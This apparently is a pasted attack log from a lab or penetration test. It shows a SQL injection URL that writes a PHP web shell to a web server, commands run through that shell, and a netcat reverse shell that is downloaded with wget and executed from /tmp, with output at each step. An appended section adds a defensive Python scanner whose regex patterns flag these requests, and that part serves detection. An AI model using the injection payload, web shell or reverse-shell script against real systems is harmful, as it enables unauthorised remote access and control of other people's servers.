
Untitled

a guest
Jan 28th, 2020
Using PHP scripting manipulation through the SQL access, used the following script code to create a backdoor file called backdoor.php

http://swancorp.com/swancorp/timecards/edit_type.php?type_id=740%20union%20all%20select%20%22%3C?php%20echo%20shell_exec($_GET[%27cmd%27]);?%3E%22%20into%20OUTFILE%20%27/var/www/html/swancorp/backdoor.php%27;#

Then used the following PHP scripts to get differing results:

Directory list
http://swancorp.com/swancorp/backdoor.php?cmd=ls

about.html backdoor.php cache contact.html css evilbackdoor.php fonts images index.html js nagios_exploit.sh portfolio.html sass swancorp.sh timecards

Router info
http://swancorp.com/swancorp/backdoor.php?cmd=route

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         10.10.127.1     0.0.0.0         UG    0      0        0 eth0
10.10.0.0       *               255.255.0.0     U     0      0        0 eth0

Linux version
http://swancorp.com/swancorp/backdoor.php?cmd=cat /etc/issue

Ubuntu 14.04.5 LTS \n \l


Using the following backdoor commands through the host shell first and then the target PHP access next, attempted to get a connection from the target system to the host system.

nc -lvp 12345

http://swancorp.com/swancorp/backdoor.php?cmd=nc 10.10.127.89 12345

root@kali-linux:~# nc -lvp 12345
listening on [any] 12345 ...
connect to [10.10.127.89] from swancorp.com [10.10.127.209] 54630


Made a script file containing the code:
#!/bin/sh
nc.traditional -e /bin/sh 10.10.127.89 12345

This was to enable a constant connection between host and target machines.

Then used the following PHP command to have the script downloaded:
http://swancorp.com/swancorp/backdoor.php?cmd=wget -P /tmp/ http://10.10.127.89/ncscript.sh

Verified that the file was successfully transferred to the target system using:
http://swancorp.com/swancorp/backdoor.php?cmd=ls /tmp/

hsperfdata_tomcat7 index.html ncscript tomcat7-tomcat7-tmp vmware-root

Then modified the script file's permissions on the target system using:
http://swancorp.com/swancorp/backdoor.php?cmd=chmod 777 /tmp/ncscript

Executed the script using the command:
http://swancorp.com/swancorp/backdoor.php?cmd=sh /tmp/ncscript

Used simple terminal commands to verify that the connection is constant.

whoami
www-data

ifconfig
eth0      Link encap:Ethernet HWaddr 00:50:56:b8:1e:8e
          inet addr:10.10.127.209 Bcast:10.10.255.255 Mask:255.255.0.0
          inet6 addr: fe80::250:56ff:feb8:1e8e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
          RX packets:921352 errors:0 dropped:1113 overruns:0 frame:0
          TX packets:113252 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:124236261 (124.2 MB) TX bytes:11509356 (11.5 MB)
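
A defender's view of the requests in these notes, as an added example that is not part of the original paste: a web access-log scanner that flags the three URL patterns used above (UNION ... INTO OUTFILE, PHP code inside a parameter, and shell commands passed to a .php script). The log lines are constructed; hosts and paths come from the notes, while the timestamps, the `view` parameter and the rule names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed access-log lines (Apache combined style), not real traffic.
# Hosts and paths are the ones in the notes above; "view" is a made-up parameter.
SAMPLE_LOG = """\
10.10.127.89 - - [28/Jan/2020:10:01:02 +0000] "GET /swancorp/timecards/edit_type.php?type_id=740%20union%20all%20select%20%22%3C?php%20echo%20shell_exec($_GET[%27cmd%27]);?%3E%22%20into%20OUTFILE%20%27/var/www/html/swancorp/backdoor.php%27 HTTP/1.1" 200 512
10.10.127.89 - - [28/Jan/2020:10:02:10 +0000] "GET /swancorp/backdoor.php?cmd=cat%20/etc/issue HTTP/1.1" 200 24
10.10.127.89 - - [28/Jan/2020:10:05:44 +0000] "GET /swancorp/backdoor.php?cmd=wget%20-P%20/tmp/%20http://10.10.127.89/ncscript.sh HTTP/1.1" 200 0
10.10.0.15 - - [28/Jan/2020:10:06:00 +0000] "GET /swancorp/timecards/edit_type.php?type_id=740&view=shipping HTTP/1.1" 200 900
10.10.0.15 - - [28/Jan/2020:10:06:05 +0000] "GET /swancorp/contact.html HTTP/1.1" 200 1433
"""

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d{3}')
# SQL injection that writes a file to disk via SELECT ... INTO OUTFILE/DUMPFILE.
SQLI_FILE_WRITE = re.compile(
    r"\bunion\b.*\bselect\b.*\binto\s+(?:out|dump)file\b", re.I | re.S)
# A PHP open tag has no business inside a query string.
PHP_TAG = re.compile(r"<\?php", re.I)
# Parameter value that begins with a common shell binary (word-bounded, so
# values such as "shipping" or "catalog" do not match).
SHELL_VALUE = re.compile(
    r"^\s*(?:ls|cat|route|wget|curl|nc(?:\.traditional)?|chmod|sh|bash|"
    r"whoami|ifconfig|id)\b")


def classify(line):
    """Return (client_ip, path, [findings]) for a suspicious line, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    decoded = unquote_plus(query)  # match on the decoded form, as the app sees it
    findings = []
    if SQLI_FILE_WRITE.search(decoded):
        findings.append("sqli-into-outfile")
    if PHP_TAG.search(decoded):
        findings.append("php-code-in-parameter")
    if path.lower().endswith(".php"):
        for name, value in parse_qsl(query, keep_blank_values=True):
            if SHELL_VALUE.match(value):
                findings.append(f"shell-command-in-{name}")
    return (m["ip"], path, findings) if findings else None


def scan(log_text):
    """Classify every line of a log and keep only the flagged ones."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]
```

Only GET query strings are inspected here; payloads sent in POST bodies never reach a standard access log and need WAF or application-level logging to be seen.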